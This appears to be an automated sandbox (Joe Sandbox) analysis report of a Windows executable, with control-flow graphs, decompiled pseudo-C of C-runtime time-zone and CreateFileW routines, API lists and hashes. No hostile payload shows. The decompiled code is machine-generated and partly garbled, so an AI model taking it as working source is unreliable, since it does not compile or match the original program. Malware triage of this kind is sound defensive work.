                                                                                                                                                                                                                                                        control_flow_graph 135 7ff6e5ad4e20-7ff6e5ad4e5b call 7ff6e5ad47a8 call 7ff6e5ad47b0 call 7ff6e5ad4818 142 7ff6e5ad5085-7ff6e5ad50d1 call 7ff6e5ac9dd0 call 7ff6e5ad47a8 call 7ff6e5ad47b0 call 7ff6e5ad4818 135->142 143 7ff6e5ad4e61-7ff6e5ad4e6c call 7ff6e5ad47b8 135->143 169 7ff6e5ad520f-7ff6e5ad527d call 7ff6e5ac9dd0 call 7ff6e5ad06b8 142->169 170 7ff6e5ad50d7-7ff6e5ad50e2 call 7ff6e5ad47b8 142->170 143->142 148 7ff6e5ad4e72-7ff6e5ad4e7c 143->148 151 7ff6e5ad4e9e-7ff6e5ad4ea2 148->151 152 7ff6e5ad4e7e-7ff6e5ad4e81 148->152 153 7ff6e5ad4ea5-7ff6e5ad4ead 151->153 155 7ff6e5ad4e84-7ff6e5ad4e8f 152->155 153->153 156 7ff6e5ad4eaf-7ff6e5ad4ec2 call 7ff6e5accacc 153->156 158 7ff6e5ad4e91-7ff6e5ad4e98 155->158 159 7ff6e5ad4e9a-7ff6e5ad4e9c 155->159 165 7ff6e5ad4ec4-7ff6e5ad4ec6 call 7ff6e5ac9e18 156->165 166 7ff6e5ad4eda-7ff6e5ad4ee6 call 7ff6e5ac9e18 156->166 158->155 158->159 159->151 162 7ff6e5ad4ecb-7ff6e5ad4ed9 159->162 165->162 176 7ff6e5ad4eed-7ff6e5ad4ef5 166->176 187 7ff6e5ad527f-7ff6e5ad5286 169->187 188 7ff6e5ad528b-7ff6e5ad528e 169->188 170->169 178 7ff6e5ad50e8-7ff6e5ad50f3 call 7ff6e5ad47e8 170->178 176->176 179 7ff6e5ad4ef7-7ff6e5ad4f08 call 7ff6e5acf924 176->179 178->169 189 7ff6e5ad50f9-7ff6e5ad511c call 7ff6e5ac9e18 GetTimeZoneInformation 178->189 179->142 190 7ff6e5ad4f0e-7ff6e5ad4f64 call 7ff6e5abc210 * 4 call 7ff6e5ad4d3c 179->190 191 7ff6e5ad531b-7ff6e5ad531e 187->191 193 7ff6e5ad52c5-7ff6e5ad52d8 call 7ff6e5accacc 188->193 194 7ff6e5ad5290 188->194 206 7ff6e5ad5122-7ff6e5ad5143 189->206 207 7ff6e5ad51e4-7ff6e5ad520e call 7ff6e5ad47a0 call 7ff6e5ad4790 call 7ff6e5ad4798 189->207 247 7ff6e5ad4f66-7ff6e5ad4f6a 190->247 198 7ff6e5ad5293 191->198 199 7ff6e5ad5324-7ff6e5ad532c call 7ff6e5ad4e20 191->199 213 7ff6e5ad52e3-7ff6e5ad52fe call 7ff6e5ad06b8 193->213 214 7ff6e5ad52da 193->214 194->198 201 7ff6e5ad5298-7ff6e5ad52c4 call 7ff6e5ac9e18 call 7ff6e5abad80 198->201 202 7ff6e5ad5293 call 7ff6e5ad509c 198->202 199->201 202->201 208 7ff6e5ad5145-7ff6e5ad514b 206->208 209 7ff6e5ad514e-7ff6e5ad5155 206->209 208->209 216 7ff6e5ad5157-7ff6e5ad515f 209->216 217 7ff6e5ad5169 209->217 235 7ff6e5ad5305-7ff6e5ad5317 call 7ff6e5ac9e18 213->235 236 7ff6e5ad5300-7ff6e5ad5303 213->236 221 7ff6e5ad52dc-7ff6e5ad52e1 call 7ff6e5ac9e18 214->221 216->217 223 7ff6e5ad5161-7ff6e5ad5167 216->223 226 7ff6e5ad516b-7ff6e5ad51df call 7ff6e5abc210 * 4 call 7ff6e5ad1c7c call 7ff6e5ad5334 * 2 217->226 221->194 223->226 226->207 235->191 236->221 249 7ff6e5ad4f70-7ff6e5ad4f74 247->249 250 7ff6e5ad4f6c 247->250 249->247 252 7ff6e5ad4f76-7ff6e5ad4f9b call 7ff6e5ad7c64 249->252 250->249 258 7ff6e5ad4f9e-7ff6e5ad4fa2 252->258 260 7ff6e5ad4fa4-7ff6e5ad4faf 258->260 261 7ff6e5ad4fb1-7ff6e5ad4fb5 258->261 260->261 263 7ff6e5ad4fb7-7ff6e5ad4fbb 260->263 261->258 266 7ff6e5ad503c-7ff6e5ad5040 263->266 267 7ff6e5ad4fbd-7ff6e5ad4fe5 call 7ff6e5ad7c64 263->267 268 7ff6e5ad5042-7ff6e5ad5044 266->268 269 7ff6e5ad5047-7ff6e5ad5054 266->269 275 7ff6e5ad5003-7ff6e5ad5007 267->275 276 7ff6e5ad4fe7 267->276 268->269 271 7ff6e5ad506f-7ff6e5ad507e call 7ff6e5ad47a0 call 7ff6e5ad4790 269->271 272 7ff6e5ad5056-7ff6e5ad506c call 7ff6e5ad4d3c 269->272 271->142 272->271 275->266 281 7ff6e5ad5009-7ff6e5ad5027 call 7ff6e5ad7c64 275->281 279 7ff6e5ad4fea-7ff6e5ad4ff1 276->279 279->275 282 7ff6e5ad4ff3-7ff6e5ad5001 279->282 287 7ff6e5ad5033-7ff6e5ad503a 281->287 282->275 282->279 287->266 288 7ff6e5ad5029-7ff6e5ad502d 287->288 288->266 289 7ff6e5ad502f 288->289 289->287
                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AD4E20(void* __eflags, void* __rax, signed short* __rcx, char _a16, char _a24) {
                                                                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                                                                        				intOrPtr _t23;
                                                                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                                                                        				signed short* _t31;
                                                                                                                                                                                                                                                        				intOrPtr _t36;
                                                                                                                                                                                                                                                        				signed long long _t42;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t29 = __rax;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD47B0(E00007FF67FF6E5AD47A8(_t10));
                                                                                                                                                                                                                                                        				r12d = 0;
                                                                                                                                                                                                                                                        				_a16 = r12d;
                                                                                                                                                                                                                                                        				_a24 = r12d;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD4818(_t29,  &_a16) != 0) goto 0xe5ad5085;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD47B8(_t29,  &_a24) != 0) goto 0xe5ad5085;
                                                                                                                                                                                                                                                        				_t36 =  *0xe5afd2c0; // 0x0
                                                                                                                                                                                                                                                        				_t23 = _t36;
                                                                                                                                                                                                                                                        				if (_t23 == 0) goto 0xe5ad4e9e;
                                                                                                                                                                                                                                                        				r8d =  *(__rcx + _t36 - __rcx) & 0x0000ffff;
                                                                                                                                                                                                                                                        				if (_t23 != 0) goto 0xe5ad4e9a;
                                                                                                                                                                                                                                                        				_t31 =  &(__rcx[1]);
                                                                                                                                                                                                                                                        				if (r8d != 0) goto 0xe5ad4e84;
                                                                                                                                                                                                                                                        				if (( *__rcx & 0x0000ffff) - r8d == 0) goto 0xe5ad4ecb;
                                                                                                                                                                                                                                                        				_t39 = (_t42 | 0xffffffff) + 1;
                                                                                                                                                                                                                                                        				if (__rcx[(_t42 | 0xffffffff) + 1] != r12w) goto 0xe5ad4ea5;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACCACC(_t31, 2 + _t39 * 2);
                                                                                                                                                                                                                                                        				if (_t31 != 0) goto 0xe5ad4eda;
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5AC9E18(_t31, 2 + _t39 * 2);
                                                                                                                                                                                                                                                        			}









                                                                                                                                                                                                                                                        0x7ff6e5ad4e20
                                                                                                                                                                                                                                                        0x7ff6e5ad4e3d
                                                                                                                                                                                                                                                        0x7ff6e5ad4e42
                                                                                                                                                                                                                                                        0x7ff6e5ad4e49
                                                                                                                                                                                                                                                        0x7ff6e5ad4e50
                                                                                                                                                                                                                                                        0x7ff6e5ad4e5b
                                                                                                                                                                                                                                                        0x7ff6e5ad4e6c
                                                                                                                                                                                                                                                        0x7ff6e5ad4e72
                                                                                                                                                                                                                                                        0x7ff6e5ad4e79
                                                                                                                                                                                                                                                        0x7ff6e5ad4e7c
                                                                                                                                                                                                                                                        0x7ff6e5ad4e87
                                                                                                                                                                                                                                                        0x7ff6e5ad4e8f
                                                                                                                                                                                                                                                        0x7ff6e5ad4e91
                                                                                                                                                                                                                                                        0x7ff6e5ad4e98
                                                                                                                                                                                                                                                        0x7ff6e5ad4e9c
                                                                                                                                                                                                                                                        0x7ff6e5ad4ea5
                                                                                                                                                                                                                                                        0x7ff6e5ad4ead
                                                                                                                                                                                                                                                        0x7ff6e5ad4eb7
                                                                                                                                                                                                                                                        0x7ff6e5ad4ec2
                                                                                                                                                                                                                                                        0x7ff6e5ad4ed9

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6E5AD4E65
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AD47B8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E5AD47CC
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AC9E18: RtlReleasePrivilege.NTDLL(?,?,?,00007FF6E5AD1E42,?,?,?,00007FF6E5AD1E7F,?,?,00000000,00007FF6E5AD2345,?,?,?,00007FF6E5AD2277), ref: 00007FF6E5AC9E2E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AC9E18: GetLastError.KERNEL32(?,?,?,00007FF6E5AD1E42,?,?,?,00007FF6E5AD1E7F,?,?,00000000,00007FF6E5AD2345,?,?,?,00007FF6E5AD2277), ref: 00007FF6E5AC9E38
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AC9DD0: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6E5AC9DAF,?,?,?,?,?,00007FF6E5AC21EC), ref: 00007FF6E5AC9DD9
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AC9DD0: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6E5AC9DAF,?,?,?,?,?,00007FF6E5AC21EC), ref: 00007FF6E5AC9DFE
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6E5AD4E54
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AD4818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E5AD482C
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6E5AD50CA
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6E5AD50DB
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6E5AD50EC
                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6E5AD532C), ref: 00007FF6E5AD5113
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLastPresentPrivilegeProcessProcessorReleaseTimeZone
                                                                                                                                                                                                                                                        • String ID: Pacific Daylight Time$Pacific Standard Time
                                                                                                                                                                                                                                                        • API String ID: 415722205-1154798116
                                                                                                                                                                                                                                                        • Opcode ID: fa51cbb1cdf4c91952ffe20c9e6d672478d4f0a9d9132c459d3c23df6a9e1a94
                                                                                                                                                                                                                                                        • Instruction ID: 54a2ffc0d7c1ebeb735741c94dc38ef0004570e62e4941675a9828a26141d72f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa51cbb1cdf4c91952ffe20c9e6d672478d4f0a9d9132c459d3c23df6a9e1a94
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3BD1AF27B0824246E724BF29D4617B966A1FF48F88F444139EE4DC7685DF3EEC418B4A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 320 7ff6e5ad5d6c-7ff6e5ad5ddf call 7ff6e5ad5aa0 323 7ff6e5ad5de1-7ff6e5ad5dea call 7ff6e5ac4424 320->323 324 7ff6e5ad5df9-7ff6e5ad5e03 call 7ff6e5ac6cfc 320->324 331 7ff6e5ad5ded-7ff6e5ad5df4 call 7ff6e5ac4444 323->331 329 7ff6e5ad5e05-7ff6e5ad5e1c call 7ff6e5ac4424 call 7ff6e5ac4444 324->329 330 7ff6e5ad5e1e-7ff6e5ad5e87 CreateFileW 324->330 329->331 333 7ff6e5ad5f04-7ff6e5ad5f0f GetFileType 330->333 334 7ff6e5ad5e89-7ff6e5ad5e8f 330->334 347 7ff6e5ad613a-7ff6e5ad615a 331->347 340 7ff6e5ad5f62-7ff6e5ad5f69 333->340 341 7ff6e5ad5f11-7ff6e5ad5f4c GetLastError call 7ff6e5ac43b8 CloseHandle 333->341 337 7ff6e5ad5ed1-7ff6e5ad5eff GetLastError call 7ff6e5ac43b8 334->337 338 7ff6e5ad5e91-7ff6e5ad5e95 334->338 337->331 338->337 345 7ff6e5ad5e97-7ff6e5ad5ecf CreateFileW 338->345 343 7ff6e5ad5f71-7ff6e5ad5f74 340->343 344 7ff6e5ad5f6b-7ff6e5ad5f6f 340->344 341->331 354 7ff6e5ad5f52-7ff6e5ad5f5d call 7ff6e5ac4444 341->354 350 7ff6e5ad5f7a-7ff6e5ad5fcf call 7ff6e5ac6c14 343->350 351 7ff6e5ad5f76 343->351 344->350 345->333 345->337 359 7ff6e5ad5fee-7ff6e5ad601f call 7ff6e5ad5820 350->359 360 7ff6e5ad5fd1-7ff6e5ad5fdd call 7ff6e5ad5ca8 350->360 351->350 354->331 365 7ff6e5ad6025-7ff6e5ad6067 359->365 366 7ff6e5ad6021-7ff6e5ad6023 359->366 360->359 367 7ff6e5ad5fdf 360->367 369 7ff6e5ad6089-7ff6e5ad6094 365->369 370 7ff6e5ad6069-7ff6e5ad606d 365->370 368 7ff6e5ad5fe1-7ff6e5ad5fe9 call 7ff6e5ac9f90 366->368 367->368 368->347 372 7ff6e5ad609a-7ff6e5ad609e 369->372 373 7ff6e5ad6138 369->373 370->369 371 7ff6e5ad606f-7ff6e5ad6084 370->371 371->369 372->373 376 7ff6e5ad60a4-7ff6e5ad60e9 CloseHandle CreateFileW 372->376 373->347 377 7ff6e5ad611e-7ff6e5ad6133 376->377 378 7ff6e5ad60eb-7ff6e5ad6119 GetLastError call 7ff6e5ac43b8 call 7ff6e5ac6e3c 376->378 377->373 378->377
                                                                                                                                                                                                                                                        C-Code - Quality: 40%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AD5D6C(void* __ecx, void* __eflags, long long __rbx, long long __rcx, signed int* __rdx, long long __rdi, long long __rsi, long long __r8) {
                                                                                                                                                                                                                                                        				void* __rbp;
                                                                                                                                                                                                                                                        				signed int _t148;
                                                                                                                                                                                                                                                        				long _t161;
                                                                                                                                                                                                                                                        				void* _t165;
                                                                                                                                                                                                                                                        				signed int _t167;
                                                                                                                                                                                                                                                        				void* _t182;
                                                                                                                                                                                                                                                        				signed int _t185;
                                                                                                                                                                                                                                                        				signed int _t186;
                                                                                                                                                                                                                                                        				intOrPtr* _t234;
                                                                                                                                                                                                                                                        				intOrPtr* _t237;
                                                                                                                                                                                                                                                        				long long _t249;
                                                                                                                                                                                                                                                        				long long _t257;
                                                                                                                                                                                                                                                        				signed long long _t263;
                                                                                                                                                                                                                                                        				signed long long _t279;
                                                                                                                                                                                                                                                        				signed int* _t303;
                                                                                                                                                                                                                                                        				long long _t306;
                                                                                                                                                                                                                                                        				void* _t308;
                                                                                                                                                                                                                                                        				void* _t309;
                                                                                                                                                                                                                                                        				intOrPtr* _t311;
                                                                                                                                                                                                                                                        				void* _t312;
                                                                                                                                                                                                                                                        				void* _t320;
                                                                                                                                                                                                                                                        				void* _t322;
                                                                                                                                                                                                                                                        				void* _t326;
                                                                                                                                                                                                                                                        				void* _t330;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t234 = _t311;
                                                                                                                                                                                                                                                        				 *((long long*)(_t234 + 8)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t234 + 0x10)) = __rsi;
                                                                                                                                                                                                                                                        				 *((long long*)(_t234 + 0x20)) = __rdi;
                                                                                                                                                                                                                                                        				 *((long long*)(_t234 + 0x18)) = __r8;
                                                                                                                                                                                                                                                        				_t309 = _t234 - 0x47;
                                                                                                                                                                                                                                                        				_t312 = _t311 - 0xc0;
                                                                                                                                                                                                                                                        				r12d = r9d;
                                                                                                                                                                                                                                                        				_t257 = __r8;
                                                                                                                                                                                                                                                        				r9d =  *(_t309 + 0x77);
                                                                                                                                                                                                                                                        				_t303 = __rdx;
                                                                                                                                                                                                                                                        				r8d =  *(_t309 + 0x6f);
                                                                                                                                                                                                                                                        				_t306 = __rcx;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD5AA0(r12d, __eflags, _t234, __r8, _t309 - 1, _t309);
                                                                                                                                                                                                                                                        				asm("movups xmm0, [eax]");
                                                                                                                                                                                                                                                        				asm("movsd xmm1, [eax+0x10]");
                                                                                                                                                                                                                                                        				asm("movups [ebp-0x59], xmm0");
                                                                                                                                                                                                                                                        				asm("psrldq xmm0, 0x8");
                                                                                                                                                                                                                                                        				asm("dec cx");
                                                                                                                                                                                                                                                        				asm("movsd [ebp-0x39], xmm1");
                                                                                                                                                                                                                                                        				asm("movsd [ebp-0x49], xmm1");
                                                                                                                                                                                                                                                        				 *(_t309 - 0x29) = _t330 >> 0x20;
                                                                                                                                                                                                                                                        				if (r15d != 0xffffffff) goto 0xe5ad5df9;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4424(_t234);
                                                                                                                                                                                                                                                        				 *_t234 = 0;
                                                                                                                                                                                                                                                        				 *__rdx =  *__rdx | 0xffffffff;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t234);
                                                                                                                                                                                                                                                        				goto 0xe5ad613a;
                                                                                                                                                                                                                                                        				_t148 = E00007FF67FF6E5AC6CFC(r12d, _t234, __r8, __rdx, __rdx, _t306);
                                                                                                                                                                                                                                                        				 *__rdx = _t148;
                                                                                                                                                                                                                                                        				if (_t148 != 0xffffffff) goto 0xe5ad5e1e;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4424(_t234);
                                                                                                                                                                                                                                                        				 *_t234 = 0;
                                                                                                                                                                                                                                                        				 *__rdx =  *__rdx | 0xffffffff;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t234);
                                                                                                                                                                                                                                                        				 *_t234 = 0x18;
                                                                                                                                                                                                                                                        				goto 0xe5ad5ded;
                                                                                                                                                                                                                                                        				r8d = r15d;
                                                                                                                                                                                                                                                        				r14d = r14d |  *(_t309 - 0x49);
                                                                                                                                                                                                                                                        				 *_t306 = 1;
                                                                                                                                                                                                                                                        				 *((long long*)(_t312 + 0x30)) = _t306;
                                                                                                                                                                                                                                                        				 *(_t312 + 0x28) = r14d;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t312 + 0x20)) =  *((intOrPtr*)(_t309 - 0x51));
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t309 - 0x21)) = 0x18;
                                                                                                                                                                                                                                                        				 *((long long*)(_t309 - 0x19)) = _t306;
                                                                                                                                                                                                                                                        				 *(_t309 - 0x11) =  !(r12d >> 7) & 0x00000001;
                                                                                                                                                                                                                                                        				 *(_t309 - 0x31) =  *(_t309 - 0x49) >> 0x20;
                                                                                                                                                                                                                                                        				CreateFileW(??, ??, ??, ??, ??, ??, ??); // executed
                                                                                                                                                                                                                                                        				_t185 =  *(_t309 - 0x55);
                                                                                                                                                                                                                                                        				if (_t234 != 0xffffffff) goto 0xe5ad5f04;
                                                                                                                                                                                                                                                        				if ((_t185 & 0xc0000000) != 0xc0000000) goto 0xe5ad5ed1;
                                                                                                                                                                                                                                                        				if ((r12b & 0x00000001) == 0) goto 0xe5ad5ed1;
                                                                                                                                                                                                                                                        				 *((long long*)(_t312 + 0x30)) = _t306;
                                                                                                                                                                                                                                                        				asm("btr ebx, 0x1f");
                                                                                                                                                                                                                                                        				 *(_t309 - 0x55) = _t185;
                                                                                                                                                                                                                                                        				r8d = r15d;
                                                                                                                                                                                                                                                        				 *(_t312 + 0x28) = r14d;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t312 + 0x20)) =  *((intOrPtr*)(_t309 - 0x51));
                                                                                                                                                                                                                                                        				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                                                                                                                                                                                                                                                        				if (_t234 != 0xffffffff) goto 0xe5ad5f04;
                                                                                                                                                                                                                                                        				_t263 =  *__rdx;
                                                                                                                                                                                                                                                        				_t237 =  *((intOrPtr*)(0xe5afca30 + (_t263 >> 6) * 8));
                                                                                                                                                                                                                                                        				 *(_t237 + 0x38 + (_t263 + _t263 * 8) * 8) =  *(_t237 + 0x38 + (_t263 + _t263 * 8) * 8) & 0x000000fe;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC43B8(GetLastError(), _t237, _t263 + _t263 * 8);
                                                                                                                                                                                                                                                        				goto 0xe5ad5ded;
                                                                                                                                                                                                                                                        				_t161 = GetFileType(_t330); // executed
                                                                                                                                                                                                                                                        				if (_t161 != 0) goto 0xe5ad5f62;
                                                                                                                                                                                                                                                        				_t186 = GetLastError();
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC43B8(_t162, _t237, _t234);
                                                                                                                                                                                                                                                        				 *( *((intOrPtr*)(0xe5afca30 + ( *__rdx >> 6) * 8)) + 0x38 + ( *__rdx +  *__rdx * 8) * 8) =  *( *((intOrPtr*)(0xe5afca30 + ( *__rdx >> 6) * 8)) + 0x38 + ( *__rdx +  *__rdx * 8) * 8) & 0x000000fe;
                                                                                                                                                                                                                                                        				CloseHandle(_t326);
                                                                                                                                                                                                                                                        				if (_t186 != 0) goto 0xe5ad5ded;
                                                                                                                                                                                                                                                        				_t165 = E00007FF67FF6E5AC4444(_t237);
                                                                                                                                                                                                                                                        				 *_t237 = 0xd;
                                                                                                                                                                                                                                                        				goto 0xe5ad5ded;
                                                                                                                                                                                                                                                        				r14b =  *(_t309 - 0x59);
                                                                                                                                                                                                                                                        				if (_t165 != 2) goto 0xe5ad5f71;
                                                                                                                                                                                                                                                        				r14b = r14b | 0x00000040;
                                                                                                                                                                                                                                                        				goto 0xe5ad5f7a;
                                                                                                                                                                                                                                                        				if (_t165 != 3) goto 0xe5ad5f7a;
                                                                                                                                                                                                                                                        				r14b = r14b | 0x00000008;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC6C14(_t165, _t186,  *__rdx, _t257, _t234, __rdx, _t306, _t309, _t322, _t320);
                                                                                                                                                                                                                                                        				r14b = r14b | 0x00000001;
                                                                                                                                                                                                                                                        				 *(_t309 - 0x41) = r14b;
                                                                                                                                                                                                                                                        				 *(_t309 - 0x59) = r14b;
                                                                                                                                                                                                                                                        				 *( *((intOrPtr*)(0xe5afca30 + ( *__rdx >> 6) * 8)) + 0x38 + ( *__rdx +  *__rdx * 8) * 8) = r14b;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)( *((intOrPtr*)(0xe5afca30 + ( *__rdx >> 6) * 8)) + 0x39 + ( *__rdx +  *__rdx * 8) * 8)) = sil;
                                                                                                                                                                                                                                                        				if ((r12b & 0x00000002) == 0) goto 0xe5ad5fee;
                                                                                                                                                                                                                                                        				_t167 = E00007FF67FF6E5AD5CA8(_t186,  *__rdx, r12d & 0x0000003f, _t257, _t309 - 0x21);
                                                                                                                                                                                                                                                        				r14d = _t167;
                                                                                                                                                                                                                                                        				if (_t167 == 0) goto 0xe5ad5fee;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9F90( *((intOrPtr*)(0xe5afca30 + ( *__rdx >> 6) * 8)), _t257, _t303);
                                                                                                                                                                                                                                                        				goto 0xe5ad613a;
                                                                                                                                                                                                                                                        				asm("movups xmm0, [ebp-0x59]");
                                                                                                                                                                                                                                                        				asm("movsd xmm1, [ebp-0x39]");
                                                                                                                                                                                                                                                        				r8d = r12d;
                                                                                                                                                                                                                                                        				asm("movaps [ebp-0x1], xmm0");
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t309 - 0x61)) = sil;
                                                                                                                                                                                                                                                        				asm("movsd [ebp+0xf], xmm1");
                                                                                                                                                                                                                                                        				r14d = E00007FF67FF6E5AD5820( *_t303, _t257, _t309 - 1, _t306, _t309 - 0x61);
                                                                                                                                                                                                                                                        				if (r14d == 0) goto 0xe5ad6025;
                                                                                                                                                                                                                                                        				goto 0xe5ad5fe1;
                                                                                                                                                                                                                                                        				 *((char*)( *((intOrPtr*)(0xe5afca30 + ( *_t303 >> 6) * 8)) + 0x39 + ( *_t303 +  *_t303 * 8) * 8)) =  *((intOrPtr*)(_t309 - 0x61));
                                                                                                                                                                                                                                                        				 *( *((intOrPtr*)(0xe5afca30 + ( *_t303 >> 6) * 8)) + 0x3d + ( *_t303 +  *_t303 * 8) * 8) =  *( *((intOrPtr*)(0xe5afca30 + ( *_t303 >> 6) * 8)) + 0x3d + ( *_t303 +  *_t303 * 8) * 8) ^ (r12d >> 0x00000010 ^  *( *((intOrPtr*)(0xe5afca30 + ( *_t303 >> 6) * 8)) + 0x3d + ( *_t303 +  *_t303 * 8) * 8)) & 0x00000001;
                                                                                                                                                                                                                                                        				if (( *(_t309 - 0x41) & 0x00000048) != 0) goto 0xe5ad6089;
                                                                                                                                                                                                                                                        				if ((r12b & 0x00000008) == 0) goto 0xe5ad6089;
                                                                                                                                                                                                                                                        				_t279 =  *_t303;
                                                                                                                                                                                                                                                        				_t249 =  *((intOrPtr*)(0xe5afca30 + (_t279 >> 6) * 8));
                                                                                                                                                                                                                                                        				 *(_t249 + 0x38 + (_t279 + _t279 * 8) * 8) =  *(_t249 + 0x38 + (_t279 + _t279 * 8) * 8) | 0x00000020;
                                                                                                                                                                                                                                                        				if ((_t186 & 0xc0000000) != 0xc0000000) goto 0xe5ad6138;
                                                                                                                                                                                                                                                        				if ((r12b & 0x00000001) == 0) goto 0xe5ad6138;
                                                                                                                                                                                                                                                        				CloseHandle(_t308);
                                                                                                                                                                                                                                                        				r8d =  *(_t309 - 0x29);
                                                                                                                                                                                                                                                        				asm("btr ebx, 0x1f");
                                                                                                                                                                                                                                                        				 *((long long*)(_t312 + 0x30)) = _t306;
                                                                                                                                                                                                                                                        				 *(_t312 + 0x28) = 0xc0000000;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t312 + 0x20)) =  *((intOrPtr*)(_t309 - 0x51));
                                                                                                                                                                                                                                                        				 *(_t309 - 0x55) = _t186;
                                                                                                                                                                                                                                                        				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                                                                                                                                                                                                                                                        				if (_t249 != 0xffffffff) goto 0xe5ad611e;
                                                                                                                                                                                                                                                        				_t182 = E00007FF67FF6E5AC43B8(GetLastError(), _t249,  *((intOrPtr*)(_t309 + 0x5f)));
                                                                                                                                                                                                                                                        				 *( *((intOrPtr*)(0xe5afca30 + ( *_t303 >> 6) * 8)) + 0x38 + ( *_t303 +  *_t303 * 8) * 8) =  *( *((intOrPtr*)(0xe5afca30 + ( *_t303 >> 6) * 8)) + 0x38 + ( *_t303 +  *_t303 * 8) * 8) & 0x000000fe;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC6E3C(_t182, _t186,  *_t303, _t257, _t303, _t306);
                                                                                                                                                                                                                                                        				goto 0xe5ad5ded;
                                                                                                                                                                                                                                                        				 *((long long*)( *((intOrPtr*)(0xe5afca30 + ( *_t303 >> 6) * 8)) + 0x28 + ( *_t303 +  *_t303 * 8) * 8)) = _t249;
                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                        			}



























                                                                                                                                                                                                                                                        0x7ff6e5ad5d6c
                                                                                                                                                                                                                                                        0x7ff6e5ad5d6f
                                                                                                                                                                                                                                                        0x7ff6e5ad5d73
                                                                                                                                                                                                                                                        0x7ff6e5ad5d77
                                                                                                                                                                                                                                                        0x7ff6e5ad5d7b
                                                                                                                                                                                                                                                        0x7ff6e5ad5d88
                                                                                                                                                                                                                                                        0x7ff6e5ad5d8c
                                                                                                                                                                                                                                                        0x7ff6e5ad5d93
                                                                                                                                                                                                                                                        0x7ff6e5ad5d96
                                                                                                                                                                                                                                                        0x7ff6e5ad5d99
